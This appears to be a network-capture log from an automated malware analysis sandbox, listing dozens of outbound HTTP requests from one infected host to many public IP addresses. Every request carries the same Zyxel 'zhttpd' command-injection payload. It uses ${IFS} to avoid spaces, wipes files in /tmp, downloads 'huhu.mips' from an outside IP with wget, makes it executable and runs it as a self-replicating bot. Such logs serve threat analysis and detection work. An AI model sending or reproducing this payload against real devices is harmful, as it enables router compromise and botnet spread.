                                                      Feb 2, 2024 06:35:56.704735041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5280192.168.2.1433880173.111.87.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704782963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5281192.168.2.146040883.51.26.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704812050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5282192.168.2.145300669.226.134.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704852104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5283192.168.2.1452952131.148.244.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704881907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5284192.168.2.14430204.216.247.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704931021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5285192.168.2.143874857.69.35.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.704977036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5286192.168.2.1441404207.243.80.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705007076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5287192.168.2.145384449.94.7.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705070972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5288192.168.2.145552065.9.63.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705111027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5289192.168.2.1454350219.142.23.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705153942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5290192.168.2.144740644.39.68.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705183029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5291192.168.2.1445024158.254.23.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705236912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5292192.168.2.145387095.117.88.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705276012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5293192.168.2.1434314152.37.165.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705306053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5294192.168.2.1446080195.217.102.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705342054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5295192.168.2.143368846.5.221.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705393076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5296192.168.2.1444718139.193.93.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705446959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5297192.168.2.1457894100.202.209.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705460072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5298192.168.2.1453970185.177.146.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705508947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5299192.168.2.1444674194.83.204.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705554008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5300192.168.2.1449340114.85.97.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705600023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5301192.168.2.1437826173.225.230.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705653906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5302192.168.2.1437018138.159.154.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705717087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5303192.168.2.1443222123.40.27.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705738068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5304192.168.2.145670434.210.98.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705781937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5305192.168.2.1447072205.190.69.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705840111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5306192.168.2.143559889.62.1.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705867052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5307192.168.2.144124831.11.11.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705900908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5308192.168.2.1449028122.128.17.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705944061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5309192.168.2.145604446.245.204.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.705974102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5310192.168.2.1457474189.112.136.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706017971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5311192.168.2.14538024.172.175.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706059933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5312192.168.2.1443254109.67.158.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706182003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5313192.168.2.1455252181.175.202.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706208944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5314192.168.2.1446874151.251.78.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706253052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5315192.168.2.146017460.88.26.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706281900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5316192.168.2.1450966181.229.61.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706342936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5317192.168.2.1449104158.227.202.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706368923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5318192.168.2.1436904146.183.172.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706433058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5319192.168.2.145908217.39.76.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706470013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5320192.168.2.1441658188.173.160.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706494093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5321192.168.2.1444170168.247.53.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706526041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5322192.168.2.1436906207.156.27.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706568003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5323192.168.2.144766487.21.247.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706593037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5324192.168.2.144810018.237.162.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706640959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5325192.168.2.1458812123.5.144.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706702948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5326192.168.2.145918844.217.204.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706726074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5327192.168.2.1439914173.119.20.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706778049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5328192.168.2.1439462190.147.104.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706818104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5329192.168.2.1441982115.211.181.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706856012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5330192.168.2.1458826104.115.170.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706933975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5331192.168.2.146066251.244.186.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.706980944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5332192.168.2.144186292.140.147.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707016945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5333192.168.2.1454298223.48.25.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707060099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5334192.168.2.144743873.212.209.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707098961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5335192.168.2.1447720170.17.221.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707132101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5336192.168.2.1436166123.162.101.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707189083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5337192.168.2.1454354133.207.246.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707231045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5338192.168.2.145440034.84.55.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707266092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5339192.168.2.1438772160.0.228.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707289934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5340192.168.2.143615824.230.233.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707339048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5341192.168.2.144577025.2.61.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707379103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5342192.168.2.1445124155.50.39.53443
                                                      TimestampBytes transferredDirectionData
